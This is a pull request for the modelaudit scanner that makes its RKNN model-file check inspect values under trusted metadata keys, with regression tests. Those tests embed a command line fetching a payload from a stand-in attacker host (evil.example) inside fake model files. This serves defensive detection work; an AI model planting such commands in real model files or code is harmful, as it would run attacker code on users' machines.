### PR TITLE
fix: scan RKNN safe metadata values

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Bug Fixes
 
+- scan dangerous RKNN safe-key metadata values instead of suppressing the whole key-value string
 - route renamed structured JAX/Orbax JSON checkpoints, conservatively report observable bounded-prefix threats, and fail closed for oversized identified metadata
 - classify Flax MessagePack recursion-limit analysis gaps as inconclusive coverage
 - classify incomplete JAX/Orbax metadata, pickle, and NumPy analysis as inconclusive coverage

--- a/modelaudit/scanners/rknn_scanner.py
+++ b/modelaudit/scanners/rknn_scanner.py
@@ -290,11 +290,13 @@ class RknnScanner(BaseScanner):
         return not (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast)
 
     @staticmethod
-    def _is_safe_metadata_string(text: str) -> bool:
+    def _metadata_value_for_scanning(text: str) -> str:
         if "=" not in text:
-            return False
-        key = text.split("=", 1)[0].strip().lower()
-        return key in KNOWN_SAFE_KEYS
+            return text
+        key, value = text.split("=", 1)
+        if key.strip().lower() in KNOWN_SAFE_KEYS:
+            return value.strip()
+        return text
 
     @staticmethod
     def _snippet(text: str, max_chars: int = 180) -> str:
@@ -303,21 +305,22 @@ class RknnScanner(BaseScanner):
     def _check_path_references(self, path: str, extracted_strings: list[str], result: ScanResult) -> None:
         risky_references: list[dict[str, str]] = []
         for text in extracted_strings:
-            if self._is_safe_metadata_string(text):
+            scan_text = self._metadata_value_for_scanning(text)
+            if not scan_text:
                 continue
 
-            if TRAVERSAL_PATH_PATTERN.search(text):
-                risky_references.append({"reference": self._snippet(text), "type": "filesystem_path"})
+            if TRAVERSAL_PATH_PATTERN.search(scan_text):
+                risky_references.append({"reference": self._snippet(scan_text), "type": "filesystem_path"})
                 continue
-            if REAL_FS_PREFIX_PATTERN.search(text):
+            if REAL_FS_PREFIX_PATTERN.search(scan_text):
                 # Short strings matching ~/ are likely binary noise, not real
                 # home-directory references — require a minimum length.
-                if text.startswith("~/") and len(text) < 8:
+                if scan_text.startswith("~/") and len(scan_text) < 8:
                     continue
-                risky_references.append({"reference": self._snippet(text), "type": "filesystem_path"})
+                risky_references.append({"reference": self._snippet(scan_text), "type": "filesystem_path"})
                 continue
-            if URL_PATTERN.search(text):
-                risky_references.append({"reference": self._snippet(text), "type": "url_reference"})
+            if URL_PATTERN.search(scan_text):
+                risky_references.append({"reference": self._snippet(scan_text), "type": "url_reference"})
 
         if risky_references:
             result.add_check(
@@ -346,16 +349,17 @@ class RknnScanner(BaseScanner):
         command_network_hits: list[str] = []
 
         for text in extracted_strings:
-            if self._is_safe_metadata_string(text):
+            scan_text = self._metadata_value_for_scanning(text)
+            if not scan_text:
                 continue
 
-            command_match = COMMAND_PATTERN.search(text)
+            command_match = COMMAND_PATTERN.search(scan_text)
             if not command_match:
                 continue
 
-            snippet = self._snippet(text)
-            has_network_context = bool(NETWORK_CONTEXT_PATTERN.search(text) or URL_PATTERN.search(text))
-            has_public_ip = any(self._is_public_ip(candidate) for candidate in IP_PATTERN.findall(text))
+            snippet = self._snippet(scan_text)
+            has_network_context = bool(NETWORK_CONTEXT_PATTERN.search(scan_text) or URL_PATTERN.search(scan_text))
+            has_public_ip = any(self._is_public_ip(candidate) for candidate in IP_PATTERN.findall(scan_text))
 
             if has_network_context or has_public_ip:
                 command_network_hits.append(snippet)
@@ -392,13 +396,14 @@ class RknnScanner(BaseScanner):
         obfuscated_hits: list[str] = []
 
         for text in extracted_strings:
-            if not BASE64_BLOB_PATTERN.search(text):
+            scan_text = self._metadata_value_for_scanning(text)
+            if not BASE64_BLOB_PATTERN.search(scan_text):
                 continue
-            if not DECODE_CONTEXT_PATTERN.search(text):
+            if not DECODE_CONTEXT_PATTERN.search(scan_text):
                 continue
-            if not (EXEC_CONTEXT_PATTERN.search(text) or COMMAND_PATTERN.search(text)):
+            if not (EXEC_CONTEXT_PATTERN.search(scan_text) or COMMAND_PATTERN.search(scan_text)):
                 continue
-            obfuscated_hits.append(self._snippet(text))
+            obfuscated_hits.append(self._snippet(scan_text))
 
         if obfuscated_hits:
             result.add_check(

--- a/tests/scanners/test_rknn_scanner.py
+++ b/tests/scanners/test_rknn_scanner.py
@@ -49,6 +49,63 @@ def test_scan_benign_rknn_no_critical_findings(tmp_path: Path) -> None:
     assert len(critical_checks) == 0
 
 
+def test_scan_safe_metadata_key_dangerous_value_is_not_skipped(tmp_path: Path) -> None:
+    payload = b"RKNN\x01\x00\x00\x00description=os.system('curl https://evil.example/payload')\nruntime=rockchip\n"
+    path = _write_rknn_file(tmp_path, payload, filename="safe-key-dangerous-value.rknn")
+
+    result = RknnScanner().scan(str(path))
+
+    correlated = [
+        check
+        for check in result.checks
+        if check.name == "RKNN Command and Network Indicator Correlation" and check.status == CheckStatus.FAILED
+    ]
+    path_references = [
+        check
+        for check in result.checks
+        if check.name == "RKNN Path Reference Validation" and check.status == CheckStatus.FAILED
+    ]
+    assert len(correlated) == 1
+    assert correlated[0].severity == IssueSeverity.CRITICAL
+    assert "curl https://evil.example/payload" in repr(correlated[0].details)
+    assert len(path_references) == 1
+
+
+def test_scan_safe_metadata_key_benign_value_stays_clean(tmp_path: Path) -> None:
+    payload = (
+        b"RKNN\x01\x00\x00\x00description=network ready model for offline execution benchmarks\nruntime=rockchip\n"
+    )
+    path = _write_rknn_file(tmp_path, payload, filename="safe-key-benign-value.rknn")
+
+    result = RknnScanner().scan(str(path))
+
+    assert not [
+        check
+        for check in result.checks
+        if check.name
+        in {
+            "RKNN Path Reference Validation",
+            "RKNN Command Indicator Detection",
+            "RKNN Command and Network Indicator Correlation",
+        }
+        and check.status == CheckStatus.FAILED
+    ]
+
+
+def test_scan_unsafe_metadata_key_dangerous_value_remains_detected(tmp_path: Path) -> None:
+    payload = b"RKNN\x01\x00\x00\x00notes=os.system('curl https://evil.example/payload')\n"
+    path = _write_rknn_file(tmp_path, payload, filename="unsafe-key-dangerous-value.rknn")
+
+    result = RknnScanner().scan(str(path))
+
+    assert any(
+        check.name == "RKNN Command and Network Indicator Correlation"
+        and check.status == CheckStatus.FAILED
+        and check.severity == IssueSeverity.CRITICAL
+        for check in result.checks
+    )
+
+
 def test_scan_detects_correlated_command_and_network_indicators(tmp_path: Path) -> None:
     payload = (
         b"RKNN\x01\x00\x00\x00"


### PR DESCRIPTION
## Summary
- scan values for RKNN metadata keys that are otherwise known-safe
- preserve benign safe-key metadata while detecting command, URL, path, and encoded-payload indicators in values
- add malicious safe-key, benign safe-key, and unsafe-key regressions

## Validation
- PROMPTFOO_DISABLE_TELEMETRY=1 uv run --active --no-sync --with-editable . pytest tests/scanners/test_rknn_scanner.py -q
- uv run --active --no-sync --with-editable . ruff format --check modelaudit/scanners/rknn_scanner.py tests/scanners/test_rknn_scanner.py
- uv run --active --no-sync --with-editable . ruff check modelaudit/scanners/rknn_scanner.py tests/scanners/test_rknn_scanner.py
- uv run --active --no-sync --with-editable . mypy modelaudit/scanners/rknn_scanner.py tests/scanners/test_rknn_scanner.py